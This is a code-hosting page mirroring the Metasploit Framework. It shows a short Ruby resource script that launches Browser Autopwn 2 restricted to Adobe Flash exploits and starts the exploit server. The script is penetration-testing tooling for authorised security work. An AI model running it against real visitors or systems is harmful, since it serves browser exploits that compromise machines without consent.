/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
scripts/resource/bap_flash_only.rc
8 строк
358 B
HD Moore
Refactor datastore names to match standards
06 июл 2015, 02:21
06 июл 2015, 02:21
d2063c9
Код
Авторство
О чём код?
<ruby> print_status("Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits.") print_status("Older Adobe Flash exploits don't use BES, therefore will not be loaded.") run_single("use auxiliary/server/browser_autopwn2") run_single("set INCLUDE_PATTERN adobe_flash") run_single("set ShowExploitList true") run_single("run") </ruby>